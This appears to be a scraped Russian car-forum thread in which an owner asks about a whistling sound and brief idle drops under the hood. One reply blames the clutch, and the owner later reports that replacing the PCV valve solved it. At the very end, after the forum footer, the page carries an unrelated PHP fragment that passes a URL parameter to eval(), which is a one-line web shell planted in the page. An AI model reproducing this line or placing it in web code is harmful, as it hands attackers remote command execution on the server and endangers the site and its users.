+ Ответить в теме
Показано с 1 по 4 из 4

Тема: Help!!! Не механический свист, что может быть?!?


  1. #1

    Help!!! Не механический свист, что может быть?!?

    Друзья! Помогите, плиз! Вопрос - имеем не механический свист под капотом, проявляется не сразу, завожу, работает ровно, через какое то время (1-2 мин) на холостых не много захлебывается (чуть падают обороты), через секунду все ок, мотор работает стабильно, но появляется некий не механический свист, трогаюсь, тяга ок, переключения деэсгэ ок, т.е. все работает в штатном режиме, без рывков и т. д. свист в движении, вроде как присутствует, но не уверен, что постоянно, если долго стоять на d, r, n, p, s.. периодически наблюдаются такие же легкие захлебывания.. обороты на секунду падают чуть чуть, потом чуть поднимаются и сразу стабилизируются.. Когда глушишь двигатель, секундк-две свист .. :(
    Ближайший диллер 250 км и то не уверен в компетенции, да и в любом случае из запчастей только расходники.. и то не все :)
    Диагностика в хорошем, но не диллерском, сервисе показала 0 ошибок по мотору и коробке, но пишет, что то типа переобогащенной смеси.. Звук не из мотора, не из коробки, но где то рядом.. Слушали оборудованием. Но без вскрывания, не было ни времени, ни желания.
    Пробег 68 т. км. Обслуживание - лучше чем за собой..
    Кто-нибудь сталкивался с подобным?

    Всем заранее спасибо за помощь :)

  2. #2
    Уточнение синдрома.. На холодную свиста нет, появляется после того, как проедешь 10-15км, под сброс газа, под нагрузкой свиста нет, или постаишь на холостых мин 15.. Свист прямо реальный противный свист, временами громкий, когда глушу двигатель секунду свист продолжается, потом, при открытом капоте, слышно, как где то воздух или что то еще перепускается..
    Коапан PCV уже заказал, что может быть еще, просто с доставкой запчастей большая проблема, в полной дыре нахожусь, колодки тормазные везли 2 недели..

  3. #3
    GTI-Racing dennisio is on a distinguished road Аватар для dennisio
    Регистрация
    12.08.2011
    Откуда
    Москва-ква
    Машина
    golf5джити
    Сообщений
    135
    если у тебя механика то пора менять сцепление!такой свист первый признак(

  4. #4
    Вопрос решен, при появлении вышеуказанных синдромов быстро и легко меняется клапан PCV :)

+ Ответить в теме

Похожие темы

  1. Может ли быть такое?
    от nab в разделе Golf 6
    Ответов: 10
    Последнее сообщение: 02.07.2024, 13:06
  2. Ответов: 6
    Последнее сообщение: 02.01.2024, 21:25
  3. Может Быть Вам И Всё Равно)))
    от Lina в разделе Курилка
    Ответов: 22
    Последнее сообщение: 03.03.2019, 20:21
  4. что это может быть????
    от yurik 01 в разделе Ходовая
    Ответов: 7
    Последнее сообщение: 30.01.2011, 10:21
  5. Что это может быть за ошибка?
    от александрио в разделе Двигатель
    Ответов: 3
    Последнее сообщение: 30.07.2010, 10:26

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}